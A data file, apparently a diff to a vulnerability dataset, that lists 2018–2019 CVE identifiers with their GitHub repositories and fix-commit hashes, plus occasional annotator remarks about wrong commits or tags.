+CVE-2018-19620;https://github.com/star7th/showdoc;None:None;False;bcdb5e3519285bdf81e618b3c9b90d22bc49e13c,7e9f06c2f0cbbae55b0cfa0797fe2b4aae562443; +CVE-2018-19787;https://github.com/lxml/lxml;None:None;False;6be1d081b49c97cfd7b3fbd934a193b668629109; +CVE-2018-19992;https://github.com/Dolibarr/dolibarr;None:None;False;0f06e39d23636bd1e4039ac61a743c79725c798b; +CVE-2018-19993;https://github.com/Dolibarr/dolibarr;None:None;False;fc3fcc5455d9a610b85723e89e8be43a41ad1378; +CVE-2018-19994;https://github.com/Dolibarr/dolibarr;None:None;False;850b939ffd2c7a4443649331b923d5e0da2d6446; +CVE-2018-20000;https://github.com/Bedework/bw-webdav;None:None;False;ccb87c2757bab531c53faf0637ee342a378caa7f,cd51e67093ef7f01003878a44f31bc0b2a0d73d1,67283fb8b9609acdb1a8d2e7fefe195b4a261062; +CVE-2018-20028;https://github.com/contao/contao;None:None;False;bbe5fe1d385cd1195670e2d6b972272133443c59; +CVE-2018-20059;https://github.com/pippo-java/pippo;None:None;False;9f36e5891c0b11f840e1e1561ae96d83ba9ce759; +CVE-2018-20094;https://github.com/xuxueli/xxl-conf;None:None;False;e9ea78ccacd06539f75c083c47b3419cf985a8c0,7fa384e507b7eaa5821003211107e243e0d2b49c; +CVE-2018-20227;https://github.com/eclipse/rdf4j;None:None;False;099482e52f070a3d74e5ad368cff59c91e9b4f8a,df15a4d7a8f2789c043b27c9eafe1b30316cfa79; +CVE-2018-20433;https://github.com/swaldman/c3p0;None:None;False;7dfdda63f42759a5ec9b63d725b7412f74adb3e1; +CVE-2018-20594;https://github.com/hs-web/hsweb-framework;None:None;False;b72a2275ed21240296c6539bae1049c56abb542f; +CVE-2018-20595;https://github.com/hs-web/hsweb-framework;None:None;False;40929e9b0d336a26281a5ed2e0e721d54dd8d2f2; +CVE-2018-20677;https://github.com/twbs/bootstrap;None:None;False;2a5ba23ce8f041f3548317acc992ed8a736b609d; their commit is not correct (second one) +CVE-2018-20713;https://github.com/shopware/shopware;None:None;False;73cb46727050e28a0d7c2cf8471baaa3eaf2e5e8; +CVE-2018-20745;https://github.com/yiisoft/yii2;None:None;False;3317d26df0497c2f1a7f8fb9d1c668d911ab284f,2b6d1818783b103993873661c7736431b0a07604; +CVE-2018-20756;https://github.com/modxcms/revolution;None:None;False;4219e90f84e21f9cf4acc07ac926b5cde12731a4,b014e57624479b637586630a0376acc1e2be47c0,20049805dad576250185e4317c4ded1d21871219; +CVE-2018-20801;https://github.com/highcharts/highcharts;None:None;False;7c547e1e0f5e4379f94396efd559a566668c0dfa; +CVE-2018-20834;https://github.com/npm/node-tar;None:None;False;b0c58433c22f5e7fe8b1c76373f27e3f81dcd4c8,7ecef07da6a9e72cc0c4d0c9c6a8e85b6b52395d; +CVE-2018-20835;https://github.com/mafintosh/tar-fs;None:None;False;06672828e6fa29ac8551b1b6f36c852a9a3c58a2; +CVE-2018-20962;https://github.com/Laravel-Backpack/CRUD;None:None;False;8b6bd0a2d489a4690f6b1d7ace67e2f07f5f0cc6; +CVE-2018-20975;https://github.com/fatfreecrm/fat_free_crm;None:None;False;f2514212ae80781a9bbf7b6f4820f57d652a405f,4a57efa76ceb55c8fd8f1595f8d5c6946faa2307,346c5e0704926954e2e42f5a3c64628257a6315b,fe39b442722d9926229e325cf7a43b817bfa5a02,2f5c7fa22b085d2fe6e8aec066eb2f74c1403c1f,6d60bc8ed010c4eda05d6645c64849f415f68d65; +CVE-2018-1000013;https://github.com/jenkinsci/release-plugin;None:None;False;fe1660a5ebff2377b6a64214c6012e8615b3f81f; +CVE-2018-1000014;https://github.com/jenkinsci/translation-plugin;None:None;False;1287c8ead6adc891210b8b9fbc33f07adebf720d; +CVE-2018-1000060;https://github.com/sensu/sensu;None:None;False;46ff10023e8cbf1b6978838f47c51b20b98fe30b,44dc4263021782728c0d12b24f57c4cefd8e9360; +CVE-2018-1000088;https://github.com/doorkeeper-gem/doorkeeper;None:None;False;7b1a8373ecd69768c896000c7971dbf48948c1b5,90fe419eb72f20fb8d9a3b4ec9ff00e8f6d897c6,84fd4d03bced7d04ab2c68cecf26e838ae96faf4,39916a613b7dcc738aa38f7a17e1de9757bd0754; +CVE-2018-1000089;https://github.com/anymail/django-anymail;None:None;False;1a6086f2b58478d71f89bf27eb034ed81aefe5ef; +CVE-2018-1000096;https://github.com/brianleroux/tiny-json-http;None:None;False;1460a815c9a657daaf29ebdf085b935221fcf676,3c1e36d8bef3ef5fd8e4447f816d5ffe2bfc3190; vulnerable tag is fixed +CVE-2018-1000118;https://github.com/electron/electron;None:None;False;ce361a12e355f9e1e99c989f1ea056c9e502dbe7,92f4e5ea7d99c5a1b425c77c9c73ae360ea9f69c,0b7fd96629805e95014ac13c29f732dbd6837713; +CVE-2018-1000119;https://github.com/sinatra/sinatra;None:None;False;8aa6c42ef724f93ae309fb7c5668e19ad547eceb; +CVE-2018-1000129;https://github.com/rhuss/jolokia;None:None;False;5895d5c137c335e6b473e9dcb9baf748851bbc5f; +CVE-2018-1000134;https://github.com/pingidentity/ldapsdk;None:None;False;8471904a02438c03965d21367890276bc25fa5a6; the release commit contains the CVE ID just as reference, this is bs. Commit ID is in the advisory description +CVE-2018-1000159;https://github.com/tlsfuzzer/tlslite-ng;None:None;False;e5e9145558f4c1a81071c61c947aa55a52542585,3674815d1b0f7484454995e2737a352e0a6a93d8,cf1e82729f3bd44b9dd5d88a6f3a64c73b131889,ec5c61fae8b8eee0f62717091775f68d8161ca34; +CVE-2018-1000164;https://github.com/benoitc/gunicorn;None:None;False;1e10a02e73c87dfadc394b361af33864d0e59e24; +CVE-2018-1000518;https://github.com/aaugustin/websockets;None:None;False;b6a25ceb3555d0ba69e5961b8d7616e4c1aecb2b; +CVE-2018-1000525;https://github.com/flack/openpsa;None:None;False;097eae045cde6e59b063261cf7cdaa896d14ab39; +CVE-2018-1000531;https://github.com/FusionAuth/fusionauth-jwt;None:None;False;abb0d479389a2509f939452a6767dc424bb5e6ba; +CVE-2018-1000538;https://github.com/minio/minio;None:None;False;9c8b7306f55f2c8c0a5c7cea9a8db9d34be8faa7; +CVE-2018-1000539;https://github.com/nov/json-jwt;None:None;False;3393f394f271c87bd42ec23c300727b4437d1638,a3b2147f0f6d9aca653e7a30e453d3a92b33413f; +CVE-2018-1000559;https://github.com/qutebrowser/qutebrowser;None:None;False;5a7869f2feaa346853d2a85413d6527c87ef0d9f,4c9360237f186681b1e3f2a0f30c45161cf405c7; +CVE-2018-1000613;https://github.com/bcgit/bc-java;None:None;False;4092ede58da51af9a21e4825fbad0d9a3ef5a223,cd98322b171b15b3f88c5ec871175147893c31e6; +CVE-2018-1000620;https://github.com/hapijs/cryptiles;None:None;False;9332d4263a32b84e76bf538d7470d01ea63fa047; +CVE-2018-1000632;https://github.com/dom4j/dom4j;None:None;False;e598eb43d418744c4dbf62f647dd2381c9ce9387; +CVE-2018-1000644;https://github.com/eclipse/rdf4j;None:None;False;c412f4274a9b0a95fd4f2c26ce42b9800caf4f0a,50f2f51950227a4ec595a2922d81da487aba5135; fixed tag is vulnerable +CVE-2018-1000665;https://github.com/dojo/dojo;None:None;False;9e4b7252dc4fcfe6bed1e4e1081a05d2d0a5c53a,2e27f9ad62405dce64369cb0f7aeb5c64e873693,c15b3e7c215389a1474b2fa6565b112e3b9ffc0f,48cb00f29d8b87a5c006d237a39dcd5ec6c68fc5,595ea4e7a8da5960f29ecbe1320e755ea688797c,33eb767c477c6953446d9af8f5229d44d3dd8500,9117ffd5a3863e44c92fcd58564c0da22be858f4; +CVE-2018-1000803;https://github.com/go-gitea/gitea;None:None;False;194a11eb110cd98fc2ba52861abf7770db6885a3,99ce0bfcd7126ec0d82166c63865bde4d9d75d84; +CVE-2018-1000805;https://github.com/paramiko/paramiko;None:None;False;56c96a659658acdbb873aef8809a7b508434dcce; +CVE-2018-1000807;https://github.com/pyca/pyopenssl;None:None;False;e73818600065821d588af475b024f4eb518c3509; +CVE-2018-1000808;https://github.com/pyca/pyopenssl;None:None;False;e73818600065821d588af475b024f4eb518c3509; +CVE-2018-1000809;https://github.com/privacyidea/privacyidea;None:None;False;189312a99b499fe405fd3df5dd03a6b19ba66d46,a3edc09beffa2104f357fe24971ea3211ce40751; tracer wrong +CVE-2018-1000814;https://github.com/aio-libs/aiohttp-session;None:None;False;1b356f01bbab57d041c9a75bacd72fbbf8524728; +CVE-2018-1000820;https://github.com/neo4j-contrib/neo4j-apoc-procedures;None:None;False;e04325c48663994af0bab69a551ad64be2219708,45bc09c8bd7f17283e2a7e85ce3f02cb4be4fd1a; +CVE-2018-1000822;https://github.com/codelibs/fess;None:None;False;f68636939d479be650aaa90762c2a06b57ccc83f,4e0d9f5faaf4ec75dbe89f5ff97ece0f03b097a8,faa265b8d8f1c71e1bf3229fba5f8cc58a5611b7; +CVE-2018-1000843;https://github.com/spotify/luigi;None:None;False;1a5b64106e9182aca70b52b0c55d70c64d76f413; vulnerable tag is fixed +CVE-2018-1000850;https://github.com/square/retrofit;None:None;False;b9a7f6ad72073ddd40254c0058710e87a073047d; +CVE-2018-1000854;https://github.com/esigate/esigate;None:None;False;30cad23a8f282600c9b045e1af09f6f8a65357b1,8461193d2f358bcf1c3fabf82891a66786bfb540,b866acb1ebc661dbe475330e27e0d69693de1971; +CVE-2018-1000855;https://github.com/basecamp/easymon;None:None;False;a5deaf7359fc177fcf3fca725618b53619a30b7e,16b787030584857046ce2e81e60c811d55a015a6; +CVE-2018-1000872;https://github.com/OpenKMIP/PyKMIP;None:None;False;3a7b880bdf70d295ed8af3a5880bab65fa6b3932,06c960236bcaf6717fc5cf66cf8b5179804c5a05; +CVE-2018-1000888;https://github.com/pear/Archive_Tar;None:None;False;59ace120ac5ceb5f0d36e40e48e1884de1badf76; +CVE-2018-1002101;https://github.com/kubernetes/kubernetes;None:None;False;b2fb73ffead03d3d13f054b45867981bf2916976,46981ede3a65ac8a80abaeb6ccb480537bcb3d2d,914e404d3fc40d6c1d1d02abf2fd3ea0667f3fca,d65039c56ce4de5f2efdc38aa1284eeb95f89169,27bc865cc1bffb97d4dff38492aa9f830f859e45; +CVE-2018-1002102;https://github.com/kubernetes/kubernetes;None:None;False;50cf168e83f942f4850191c268461d07fcac19c7,d9aeea6ba4a52a4924050636c2205d007d4a507d,109b67c291de3b9bda35c35e471b9064de6ff859,4ee9f007cbc88cca5fa3e8576ff951a52a248e3c,e385ba8c4a0860746e661b39611c88aff5bee5f2,687c04c53006441ed40f4fa7c09a726cfcec380e; vulnerable tag is fixed +CVE-2018-1002105;https://github.com/kubernetes/kubernetes;None:None;False;4faa71170f4ba2d36e346ccc319b8405d807c657,753b2dbc622f5cc417845f0ff8a77f539a4213ea,0535bcef95a33855f0a722c8cd822c663fc6275e,637c7e288581ee40ab4ca210618a89a555b6e7e9,774585f773c7c591645f876e0a26155b7838debe,435f92c719f279a3a67808c80521ea17d5715c66,b84e3dd6f80af4016acfd891ef6cc50ce05d4b5b,2257c1ecbe3c0cf71dd50b82752ae189c94ec905; +CVE-2018-1002150;https://github.com/koji-project/koji;None:None;False;642bcb3bd9139aaedafe5b3600dd71a326c0026f,ab1ade75c155c2325ec92913fc5c510fd61757a1,84c0bde0cac42c3199d636ad934f852276f10975,4ea5849ff0cb9a1cc799de50b8573b0561dcfcef,5fbd954bfa883051d8cf7a294f965cb4f87dab83,8024d38f8766f95e7fd783b866966aaeffe5140e; Advisory does not mention 1.16, we find the correct backports +CVE-2018-1002200;https://github.com/codehaus-plexus/plexus-archiver;None:None;False;f8f4233508193b70df33759ae9dc6154d69c2ea8,a1b58c0cccc4e9a2e4b06284254492b6ecf6033a,58bc24e465c0842981692adbf6d75680298989de; +CVE-2018-1002201;https://github.com/zeroturnaround/zt-zip;None:None;False;759b72f33bc8f4d69f84f09fcb7f010ad45d6fff; +CVE-2018-1002203;https://github.com/ZJONSSON/node-unzipper;None:None;False;2220ddd5b58f6252069a4f99f9475441ad0b50cd,5f68901c2e2e062a5e0083a81d257eccea0eb760; +CVE-2018-1002204;https://github.com/cthackers/adm-zip;None:None;False;6f4dfeb9a2166e93207443879988f97d88a37cde,62f64004fefb894c523a7143e8a88ebe6c84df25; +CVE-2018-1002205;https://github.com/haf/DotNetZip.Semverd;None:None;False;55d2c13c0cc64654e18fcdd0038fdb3d7458e366,8e79ed7dc17fe6d3c74c7ac1344b2aa60eb30039; +CVE-2018-1002207;https://github.com/mholt/archiver;None:None;False;e4ef56d48eb029648b0e895bb0b6a393ef0829c3; +CVE-2018-1002208;https://github.com/icsharpcode/SharpZipLib;None:None;False;5376c2daf1c0e0665398dee765af2047e43146ca; commit in reference is retrieved from a release and is a random wrong one +CVE-2018-1999024;https://github.com/mathjax/MathJax;None:None;False;a55da396c18cafb767a26aa9ad96f6f4199852f1; +CVE-2019-0194;https://github.com/apache/camel;None:None;False;53185f0b221b899aacb3c379647a866a8f408a87,68f2de31b7752bd49b7898d7098b3bfe8e0d0bdb,05ff65d5cebf1fa5172c59dd16359ed583c099ca,f337a98e86ef18611b14570e6780053fe3ddcc02,15a1f10fb532bdcba184cda17be602a2358bd5e8,5b64969d37cf2906efd4623cfd473041ce5132fd; +CVE-2019-0201;https://github.com/emperwang/zookeeper;None:None;False;5ff19e3672987bdde2843a3f031e2bf0010e35f1,af741cb319d4760cfab1cd3b560635adacd8deca; this repo has no tag +CVE-2019-0207;https://github.com/apache/tapestry-5;None:None;False;6dd7219fd4707467a36091e2f7f5f6460c619099; +CVE-2019-0210;https://github.com/apache/thrift;None:None;False;264a3f318ed3e9e51573f67f963c8509786bcec2,92c660f541fff657682f8239b6a995f3b71e6214; +CVE-2019-0219;https://github.com/apache/cordova-plugin-inappbrowser;None:None;False;686108484e6a7c1a316d7c6bc869c209c46d27e3; +CVE-2019-0226;https://github.com/apache/karaf;None:None;False;fe3bc4108e5a8b3c804e5da91ec0d5695588eb25,4155eac7dffa933f12c1e0cf18e9492ccc931093,bf5ed62d310f9042f9305dafac9a851464bb27cf; +CVE-2019-0228;https://github.com/apache/pdfbox;None:None;False;e5232887e684aeffc37ebb25ee8953e43d95c77c,be36ef01842885b556a4e7b40b5e2e8e7b1d2816; +CVE-2019-0911;https://github.com/chakra-core/ChakraCore;None:None;False;a2deba5e1850782014a2a34678464b251e448337; +CVE-2019-0912;https://github.com/chakra-core/ChakraCore;None:None;False;936a5af1c07e0fdec9aab85c05339dabe4aaeeb1; +CVE-2019-0917;https://github.com/chakra-core/ChakraCore;None:None;False;b5f8fad1b00087bd0a24cc173c2dfedc4f8aee33; +CVE-2019-0922;https://github.com/chakra-core/ChakraCore;None:None;False;a9ab1aae31078e80593b9227db11d316c2239ef3; +CVE-2019-0924;https://github.com/chakra-core/ChakraCore;None:None;False;6615113a09c0618ecc10e5680ffb978bf665641f; +CVE-2019-0925;https://github.com/chakra-core/ChakraCore;None:None;False;32ca10f3955f2a3ca56c6671c721b1264eca06b8; +CVE-2019-0933;https://github.com/chakra-core/ChakraCore;None:None;False;1a550c67b33b27675c0553152cabd09e4ffe3abf; +CVE-2019-1001;https://github.com/chakra-core/ChakraCore;None:None;False;75162b7f2d8ac2b37d17564e9c979ba1bae707e8,f8a6b80b4e5f7caeb7d3a61fe6836ebf69cfff85; +CVE-2019-1052;https://github.com/chakra-core/ChakraCore;None:None;False;66ab97c09c49c631234c0ec202b0822d0c2833cc; +CVE-2019-1062;https://github.com/microsoft/ChakraCore;None:None;False;7f0d390ad77d838cbb81d4586c83ec822f384ce8; +CVE-2019-1092;https://github.com/chakra-core/ChakraCore;None:None;False;d4e767fb946128c135d77edda7a794561e1c1f06; +CVE-2019-1103;https://github.com/chakra-core/ChakraCore;None:None;False;efab3101028045cbfa0cc21bd852f75bcc037dba; +CVE-2019-1106;https://github.com/chakra-core/ChakraCore;None:None;False;362e96537af207be3ecf7fa32f338229ee1dcc46; +CVE-2019-1107;https://github.com/chakra-core/ChakraCore;None:None;False;214dec9461f9acb9a4b9004368d2a81e0c125652; +CVE-2019-1139;https://github.com/microsoft/ChakraCore;None:None;False;ae8a8d9644e677a9878e5dd7824d4b876454e799; +CVE-2019-1195;https://github.com/microsoft/ChakraCore;None:None;False;c70af488e435ebd552f3da0547dee39dc8437a64; Same comment than CVE-2019-1197 (different fix commit) +CVE-2019-1196;https://github.com/microsoft/ChakraCore;None:None;False;dce7443ae45f82eceec3284974610e1a1bbe6792; Same comment than CVE-2019-1197 (different fix commit) +CVE-2019-1197;https://github.com/microsoft/ChakraCore;None:None;False;bf52b6cfa96d6395046d0aaf87396cd7ca13f6cb; It was easier to find the fix (bf52b6c) with google than the fixed version. +CVE-2019-1552;https://github.com/openssl/openssl;None:None;False;e32bc855a81a2d48d215c506bdeb4f598045f7e9,d333ebaf9c77332754a9d5e111e2f53e1de54fdd,b15a19c148384e73338aa7c5b12652138e35ed28,54aa9d51b09d67e90db443f682cface795f5af9e; +CVE-2019-3465;https://github.com/robrichards/xmlseclibs;None:None;False;8624602cce5175986ae5df87b6ea9596b742c7f9,46fa8b5a4fee597fece67773601e8b9dde7cb7df,118450a141ac2336be1b5e5e91a22229441b0277,0a53d3c3aa87564910cae4ed01416441d3ae0db5; +CVE-2019-3498;https://github.com/django/django;None:None;False;64d2396e83aedba3fcc84ca40f23fbd22f0b9b5b,1cd00fcf52d089ef0fe03beabd05d59df8ea052a,1ecc0a395be721e987e8e9fdfadde952b6dee1c7,9f4ed7c94c62e21644ef5115e393ac426b886f2e; +CVE-2019-3564;https://github.com/facebook/fbthrift;None:None;False;c461c1bd1a3e130b181aa9c854da3030cd4b5156; +CVE-2019-3772;https://github.com/spring-projects/spring-integration;None:None;False;59c69ed40d3755ef59f80872e0ea711adbb13620; +CVE-2019-3774;https://github.com/spring-projects/spring-batch;None:None;False;8dc3bb7d3c3d0b1487e3ef3dcbdebda865d2b20e,c7930184ee4513d548940550c4eb5eeef028cb64,a6d8ac1b44afeca1bb572718ceacac774a368422; +CVE-2019-3792;https://github.com/concourse/concourse;None:None;False;dc3d15ab6c3a69890c9985f9c875d4c2949be727; +CVE-2019-3799;https://github.com/spring-cloud/spring-cloud-config;None:None;False;3632fc6f64e567286c42c5a2f1b8142bfde505c2,9617f2922ee2ae27f08676716224933f0d869719,90e8a81f6fa921e034cecb79cd100f343f7714af,d3e21866a5f192fa2582349cb3732ad0e4b8850b; +CVE-2019-3808;https://github.com/moodle/moodle;None:None;False;cfde0b8d38061f370a5c21523c2188aca5a7160d,6360f87cdca744a6a71c315853f6d811a3e54e26,9ca8ccbefc3e1f56621c866f3af69bdb6cc98a15,3d2783690da2281e5e360c40961cd6846e1dbbb8; +CVE-2019-3810;https://github.com/moodle/moodle;None:None;False;14f9bad3cebf1aa6bb73be48020653e1f792dc29,2e057f082d622b09a33fd32aff3b4d275aed04dc; +CVE-2019-3826;https://github.com/prometheus/prometheus;None:None;False;b03d6f6eff8283bd7cb063edc21041d3fb6c9878; just CHANGELOG.md +CVE-2019-3847;https://github.com/moodle/moodle;None:None;False;a37e26d2efe1ca0e4d8d69c611a748af35b33674,070f24d006eab6b958eb083530de159b43c538ed,e836242e1c04cd62d0afa4a790074fd245628e7a,93dda3bfd3caaaa8d23fe8ede543f27ef774958d,ec3b63c772d6448765c68268234cf36c1a91bcac; +CVE-2019-3850;https://github.com/moodle/moodle;None:None;False;5d87464bc6283e72969cd251ce4f399aacebd608,d3f2f990dd3c5d4e6073a77154c6423d1c304647,907b377e51c32ea37feef53e10684b504e103273,1fc481dd7b09e08e85824c1fe6733b303a36bdce,772c908d40a944efd91d897d524b255626d330d4; +CVE-2019-3888;https://github.com/undertow-io/undertow;None:None;False;20cacc96c0594f4f4f9bb1cc2b93a77b6be3f74c,9bf05b765e222dd106fee9b46314061b18b7275e; was 2.0.20:2.0.21 +CVE-2019-3894;https://github.com/wildfly/wildfly;None:None;False;84975f8a4dd5f243c7ff5122c0d36783b116a0d7,936d0b0284288c837464229a255e2cdf1e10132d; +CVE-2019-5018;https://github.com/sqlite/sqlite;None:None;False;4ded26a53c4df312e9fd06facbbf70377e969983; repo was wrong wtf, only debian says the correct fixed version +CVE-2019-5413;https://github.com/expressjs/morgan;None:None;False;e329663836809de4be557b200a5b983ab8b4e6c2; +CVE-2019-5421;https://github.com/heartcombo/devise;None:None;False;36690f33a44a489e649022f0c56f41a38020414b,fb48336709bc1a29ff15b7170ed7b33906c66888,62703943bef75aba09ec3e346aba4c9159300ecd; +CVE-2019-5444;https://github.com/ChristoPy/serve-here.js;None:None;False;cefb51d03290b6a88dd13143ab2de31b8cf57c39; +CVE-2019-5448;https://github.com/yarnpkg/yarn;None:None;False;2f08a7405cc3f6fe47c30293050bb0ac94850932,c10ef6ab60f0bc80f65838d675325f6c17f04f24; +CVE-2019-5477;https://github.com/sparklemotion/nokogiri;None:None;False;5fe449fd3ab8cc25a71499128529c821c10dde83,daffe223967b74b3205513b5e600aa5dfefe687d,6777008202c1bde0520bb09fd1f02dee64dbcb60; +CVE-2019-5479;https://github.com/larvit/larvitbase-api;None:None;False;0e953337e75770abdcc0a8bb71932a44d2239514; +CVE-2019-5484;https://github.com/bower/bower;None:None;False;45c6bfa86f6e57731b153baca9e0b41a1cc699e3; +CVE-2019-5884;https://github.com/Studio-42/elFinder;None:None;False;f133163f2d754584de65d718b2fde96191557316; +CVE-2019-6798;https://github.com/phpmyadmin/phpmyadmin;None:None;False;469934cf7d3bd19a839eb78670590f7511399435; +CVE-2019-6802;https://github.com/pypiserver/pypiserver;None:None;False;1375a67c55a9b8d4619df30d2a1c0b239d7357e6,0284cb7f50b037688efdc4fb8de83878eedbe724; +CVE-2019-6975;https://github.com/django/django;None:None;False;0bbb560183fabf0533289700845dafa94951f227,83ab3e26647f6a50cdfac01ecf735cad540b2f35,40cd19055773705301c3428ed5e08a036d2091f3,1f42f82566c9d2d73aff1c42790d6b1b243f7676,402c0caa851e265410fbcaa55318f22d2bf22ee2; +CVE-2019-7164;https://github.com/sqlalchemy/sqlalchemy;None:None;False;30307c4616ad67c01ddae2e1e8e34fabf6028414; +CVE-2019-7313;https://github.com/buildbot/buildbot;None:None;False;bdae9fea4e8978b19e12425776b2d083febd91a6,f0ccd5fd572ea8223b48bd57d8c2548b2f7d3ecf,e781f110933e05ecdb30abc64327a2c7c9ff9c5a; +CVE-2019-7537;https://github.com/pytroll/donfig;None:None;False;6332fa354f1c7d6fb126a0666be8f23adbc2fcf7,a57e36e14f32bfb48d8a1953b375ed22a35ef186; +CVE-2019-7548;https://github.com/sqlalchemy/sqlalchemy;None:None;False;30307c4616ad67c01ddae2e1e8e34fabf6028414; +CVE-2019-7617;https://github.com/elastic/apm-agent-python;None:None;False;47286d746e05897c6b3af8d465aa56ab1ed8d678; +CVE-2019-7644;https://github.com/auth0/auth0-aspnet;None:None;False;69b0a09e2f3e350ca9f6cc2cc99d0219b4f248c1,870eb4b52696cf6e530b28e74f32167df35a3f12; this repo has no tag +CVE-2019-7722;https://github.com/pmd/pmd;None:None;False;e295711343cc155cb64ea0ae29ce9d69201469b3; +CVE-2019-8331;https://github.com/twbs/bootstrap;None:None;False;7bc4d2e0bc65151b6f60dccad50c9c8f50252bd6; +CVE-2019-8457;https://github.com/sqlite/sqlite;None:None;False;e41fd72acc7a06ce5a6a7d28154db1ffe8ba37a8; +CVE-2019-8903;https://github.com/totaljs/framework;None:None;False;de16238d13848149f5d1dae51f54e397a525932b,c37cafbf3e379a98db71c1125533d1e8d5b5aef7,4d7abbcdc34d6d1287338936f418c1eb1bc41201; +CVE-2019-9153;https://github.com/openpgpjs/openpgpjs;None:None;False;327d3e5392a6f59a4270569d200c7f7a2bfc4cbc,0be91133665e81d2007cdfa02cd3cf1d839ee4f1; +CVE-2019-9154;https://github.com/openpgpjs/openpgpjs;None:None;False;0be91133665e81d2007cdfa02cd3cf1d839ee4f1,47138eed61473e13ee8f05931119d3e10542c5e1; +CVE-2019-9155;https://github.com/openpgpjs/openpgpjs;None:None;False;1dd168e7a2ce6f9ba0fddf5d198e21baca9c042d; unknown tags +CVE-2019-9212;https://github.com/sofastack/sofa-hessian;None:None;False;285b071d89c8dac21d32983e54f3a8788ca34c12; +CVE-2019-9512;https://github.com/golang/go;None:None;False;5c379a437e904eb1f94296fa9d45276cd6e4f5a9,7139b45d1410ded14e1e131151fd8dfc435ede6c,145e193131eb486077b66009beb051aba07c52a5,e152b01a468a1c18a290bf9aec52ccea7693c7f2; This is a generic protocol vuln, it is not golang/go, check the advisory and re-run +CVE-2019-9658;https://github.com/checkstyle/checkstyle;None:None;False;180b4fe37a2249d4489d584505f2b7b3ab162ec6; +CVE-2019-9826;https://github.com/phpbb/phpbb;None:None;False;3075d2fecc9f5bb780bb478c0851a704c7f9b392,fd195fba210c8625e968ef5553e61864747c8d44,da9910850a168f73c6b8dd8407a01f47d27ca1d8,56060caa4c44620929b6e17fe4622343750ad302; +CVE-2019-9844;https://github.com/Khan/simple-markdown;None:None;False;8ad751f8333ce136d1a0a120d78596a30eb1e1d9; +CVE-2019-9942;https://github.com/twigphp/Twig;None:None;False;eac5422956e1dcca89a3669a03a3ff32f0502077,ad7d27425dffc763644de93da2262f69478c691b,0f3af98ef6e71929ad67fb6e5f3ad65777c1c4c5; +CVE-2019-10071;https://github.com/apache/tapestry-5;None:None;False;cdcf49c0a2b36ffc7a004d54405bb4357870c4b2; fixed tag is vulnerable +CVE-2019-10072;https://github.com/apache/tomcat;None:None;False;0bcd69c9dd8ae0ff424f2cd46de51583510b7f35,8d14c6f21d29768a39be4b6b9517060dc6606758,7f748eb6bfaba5207c89dbd7d5adf50fae847145,ada725a50a60867af3422c8e612aecaeea856a9a; +CVE-2019-10077;https://github.com/apache/jspwiki;None:None;False;87c89f0405d6b31fc165358ce5d5bc4536e32a8a; +CVE-2019-10086;https://github.com/apache/commons-beanutils;None:None;False;62e82ad92cf4818709d6044aaf257b73d42659a4,dd48f4e589462a8cdb1f29bbbccb35d6b0291d58; +CVE-2019-10089;https://github.com/apache/jspwiki;None:None;False;2956ccb307dd4b23b25c8ddeae8d7e7b301c6ff3; +CVE-2019-10090;https://github.com/apache/jspwiki;None:None;False;139746f7c25b84049437d1d9eed9456446a08bf7; +CVE-2019-10094;https://github.com/apache/tika;None:None;False;b8655aad5efaef1c5d266676350f58743770fb5b,426be73b9e7500fa3d441231fa4e473de34743f6,c4e63c9be8665cccea8b680c59a6f5cfbc03e0fc,81c21ab0aac6b3e4102a1a8906c8c7eab6f,1158d893dc952c573f7a12c7e4855cdce479fc2a,22ff7564f2641ba195f192d7c59e9df4a3a10747; +CVE-2019-10131;https://github.com/ImageMagick/ImageMagick;None:None;False;cb1214c124e1bd61f7dd551b94a794864861592e; +CVE-2019-10154;https://github.com/moodle/moodle;None:None;False;2904a7f851da8e66be12f41d55068bf07817fbd6,a3d19efab4aff83c07db9f0ad34c8f0e1f29c64c; +CVE-2019-10157;https://github.com/keycloak/keycloak-nodejs-connect;None:None;False;55e54b55d05ba636bc125a8f3d39f0052d13f8f6; +CVE-2019-10158;https://github.com/infinispan/infinispan;None:None;False;4b381c5910265972ccaabefbdbd16a2b929f6b72,7341da552a13cb9e8a44cd13c984d1f46310653e,245a0d0b169001e5a22c0ec9903942e617c0743f,debdf5447da3626d2f970050ca79cdf98bf87661; +CVE-2019-10174;https://github.com/infinispan/infinispan;None:None;False;a7dab68d194989aaa0b0aa0781cf8ee88fbe3439,7bdc2822ccf79127a488130239c49a5e944e3ca2; +CVE-2019-10184;https://github.com/undertow-io/undertow;None:None;False;5fa7ac68c0e4251c93056d9982db5e794e04ebfa,d2715e3afa13f50deaa19643676816ce391551e9; +CVE-2019-10206;https://github.com/ansible/ansible;None:None;False;d39488ece44956f6a169a498b067bbef54552be1,d728127310b4f3a40ce8b9df3affb88ffaeea073,e9a37f8e3171105941892a86a1587de18126ec5b,4b5aed4e5af4c7aab621662f50a289e99b8ac393; +CVE-2019-10217;https://github.com/ansible/ansible;None:None;False;c1ee1f142db1e669b710a65147ea32be47a91519; +CVE-2019-10219;https://github.com/hibernate/hibernate-validator;None:None;False;20d729548511ac5cff6fd459f93de137195420fe,124b7dd6d9a4ad24d4d49f74701f05a13e56ceee; +CVE-2019-10240;https://github.com/eclipse/hawkbit;None:None;False;fa6520a094a24897035dae4a3af2a69d174c7f9d; +CVE-2019-10241;https://github.com/eclipse/jetty.project;None:None;False;ca77bd384a2970cabbbdab25cf6251c6fb76cd21; +CVE-2019-10246;https://github.com/eclipse/jetty.project;None:None;False;3d028ab2ca76086a742bac7409a3620e81ec4791,1565b5f160e600d08da9b00edf081fb353a443d9,7b774d82e8234231e99b33c19acac3b6f83c0377; +CVE-2019-10247;https://github.com/eclipse/jetty.project;None:None;False;04c994712c0b29824633598cfe0bf709f3b96f09,a15534d72c0c8d84cb821c767343a91584a4fecb,6d847d4a73b34b8c19f43dcf221eefe6859b7d55,b0f72a87d5b35ff0a814143fb1725f7c6fc4e0d7,99f3926d0546032814077cf0d0a684ed80e7bb08,d983890d1769744e7da865de7ff34065fe491a28,9f506e4123b519adccb7df3599441f55daaff31e,5ef8a8abfa63b26a6f978200519730f964ebee0b; +CVE-2019-10248;https://github.com/eclipse/vorto;None:None;False;f15b81fb76b214fe40be164dfb730434ef49ec35; +CVE-2019-10249;https://github.com/eclipse/xtext-xtend;None:None;False;f34464b117bd38e8b844b01d94cf5b072b07f6ec,169de2cecc50ed9bf81c3cdc496ad8a799bdf17b; +CVE-2019-10255;https://github.com/jupyter/notebook;None:None;False;b9d9e659e9b2edd70767129c06ac76761e046791,b981c5b055041c036e05e735694c60863075247d,70fe9f0ddb3023162ece21fbb77d5564306b913b,08c4c898182edbe97aadef1815cce50448f975cb; 